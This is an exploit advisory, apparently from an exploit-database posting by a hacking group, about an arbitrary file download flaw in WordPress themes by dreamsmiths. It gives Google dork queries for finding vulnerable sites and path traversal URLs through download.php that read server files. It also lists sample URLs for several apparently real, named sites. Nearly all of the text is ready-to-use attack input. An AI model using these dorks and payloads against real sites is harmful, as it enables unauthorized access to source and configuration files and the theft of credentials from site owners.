# Exploit Title: UWordpress dreamsmiths Themes Arbitrary File Download # Google Dork: inurl:/wp-content/themes/fiestaresidences/ inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/ # Date: 2018/01/08 # Exploit Author: IRaNHaCK Security Team # Vendor Homepage: iranhack.com # Software Link: http://www.dreamsmiths.com/ # Version: 0.0.1 # Tested on: 7 , KAli P0c: Arbitrary Download PHP File in all WordPress themes By dreamsmiths : site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.phpsite.com/wp-content/themes/optimus/download.php?file=../../../index.phpsite.com/wp-content/themes/erinvale/download.php?file=../../../index.phpsite.com/wp-content/themes/hsv/download.php?file=../../../index.php Sample: https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php